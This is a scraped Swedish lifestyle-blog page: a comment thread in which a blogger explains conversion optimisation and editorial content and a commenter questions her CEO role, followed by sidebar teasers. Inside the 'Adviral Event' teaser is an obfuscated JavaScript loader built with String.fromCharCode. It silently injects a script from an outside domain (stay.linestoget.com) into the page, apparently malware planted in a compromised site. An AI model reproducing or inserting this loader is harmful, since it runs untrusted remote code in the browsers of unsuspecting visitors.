   Hej! Jag svarade på vad både förtaget gör och min inställning till det väldigt utförligt i både första och andra blogginlägget =) Om man sedan inte tex känner till ett ord tex ( finns även mycket bransch ord) så det behöver inte vara något negativ. men att jag ska sättga mig som i detta fallet och förklara en 4 gång i samma kommentarfält=) Då räcker tiden inte till! Jag personligen älskar google, googlar både det ena och det andra! Jag skrev även min kommentar med en glad smiley, och från min sida fanns det inget ont uppsåt alls. Jag tycker att vissa här inne väljer att göra en han av en fjäder =) Onödig!

   Förklaring: Konverter/konertering = -Gör besökare till kunder.Konvertering och konverteringsoptimering är en metod för att analysera och förstå och förbättra sajt, hemsida, app osv. Att öka resultatet blir bättre, användbarheten blir bättre och man får förhopppningsvis nya. nöjda kunder/besökare (beroende på vilken tjänst vi pratar om )

   Redaktionella inslag skräddarsyr vi efter kundens behov. Men om man ska försök förklara det utan att gå för brett. Intervjuer, eller artiklar o företaget/tjänsten. Allmän information där vi lyfter fram olika företag i våra magasin, som sedan förlängs med samma redaktionella inslagg iform av en webbartikel också =) En annons är en annons. Den förmedlar ett budskap, layoutat av kunden själv eller oss, men med produkt/varumärkesplacering. En artikel som är ett redaktionellt inslag är som sagt mer en intervju eller en berättelse om förtaget. Lite mer personlig, lite roligare för läsarna att läsa och mycket mer detaljrik många gånger. Med lite snygga bilder som visar tex miljön om vi nu säger att det handlar om en herrgård. Ett redaktionellt inslagg med bilder, personliga bilder, där vi gör vårat yttersta för att förmedla känslan =) Hoppas du känner att du fått svar nu =) Jag fick en chock när jag öppnade datorn och loggade in för att mötas av denna storm… haha! ja, nog om det! ha en fin dag!

  • Hej Ann! Fina Ann med alla härliga frågor 🙂 mina andra jobb? Egen företagare, blogg, podd, kosttillskott, träningsresor och VD 😅 det räcker. Jag tycker att jag beskriver vad vi gör på lifestyle ganska bra, i både första och andra inlägget…. ☺️ Resten får du hänge med på här inne…

   • Du har inte alls svarat på vad ditt ’VD’ jobb som du kallar det innebär.
    Är det så känsligt? Jag anar nästan det.
    Jag anar också att du inte kommer jobba varannan vecka och vara men din Lilleman på Öland varannan vecka som det tydligen är sagt.
    Har jag fel?
    Kan du svara konkret?
    Om inte så förstår vi nog alla att så är fallet …

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/